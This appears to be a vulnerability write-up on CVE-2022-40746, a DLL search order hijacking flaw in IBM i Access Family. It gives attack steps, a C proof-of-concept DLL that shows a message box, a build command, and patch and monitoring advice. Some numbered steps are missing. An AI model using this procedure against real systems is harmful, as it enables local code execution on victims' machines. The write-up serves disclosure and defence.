CVE-2022-40746 - How Attackers Can Run Arbitrary Code via DLL Search Order Hijacking in IBM i Access Family (with Exploit Example)

CVE-2022-40746 is a dangerous vulnerability found in IBM i Access Family versions 1.1.2 through 1.1.4, and 1.1.4.3 through 1.1.9., giving attackers a way to execute their own code on a system. The attack is made possible by a DLL search order hijacking bug. This write-up will break down how the bug works, how it can be exploited, and provide an exclusive real-world code snippet illustrating the attack. Simple language, clear steps, and easy-to-understand code are used throughout.

What is DLL Search Order Hijacking?

DLL (Dynamic Link Library) search order hijacking happens when an application loads a DLL, but does not specify its full path. Windows will then look for the DLL in a specific order—for example, the directory the app was launched from, system directories, and the current working directory. If an attacker can drop a malicious DLL in a place the application is likely to search first, they can trick the program into loading and running their code instead of the real DLL.

IBM X-Force ID: 236581

- Reference: IBM Security Bulletin, NVD Entry  

IBM i Access Family is a client package used for accessing IBM i servers. If an attacker is able to place a malicious DLL in a directory that the vulnerable program loads from, the attacker's code will be executed when the victim runs the application.

Finds a writable folder that the IBM i Access program searches for DLLs.

3. Creates a fake DLL matching the name of a DLL the application uses, but places attacker’s code inside.

Places the malicious DLL in the target directory.

5. Waits for user to launch IBM i Access component. When the app starts, it loads the fake DLL and the attacker code runs.

Exclusive Exploit Example

Below is a simple proof-of-concept DLL in C that pops up a message box. In an actual attack, this could be replaced with any code (e.g., reverse shell, keylogger).

// malicious_dll.c
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch(ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            MessageBox(NULL, "CVE-2022-40746 DLL Hijack Executed!", "Exploit!", MB_OK);
            break;
    }
    return TRUE;
}

Building the malicious DLL (using MinGW)

gcc -shared -o malicious.dll malicious_dll.c -mwindows

Rename malicious.dll to example.dll.

3. Place example.dll in the same folder as the application executable, or high-priority search directory (often the user's folder).

Defense and Mitigation

IBM Fixes:  
Refer to IBM's Security Bulletin for patches and details. Update to 1.1.9.1 or newer to eliminate the vulnerability.

Limit write permissions to application directories.

- Use Microsoft’s Process Monitor to track DLL loads and hunting for hijack opportunities.

Further Reading & References

- IBM Security Bulletin: CVE-2022-40746
- NIST NVD Entry for CVE-2022-40746
- DLL Search Order Hijacking explained by MITRE

Conclusion

CVE-2022-40746 shows how even everyday desktop applications can become a starting point for system compromise if DLL loading is not handled carefully. By following the exploit flow above, attackers with local access can run code of their choice, potentially putting sensitive IBM i systems and data at risk. Always patch, monitor directories, and understand how your apps handle DLLs.

Timeline

Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/23/2022 17:21:00 UTC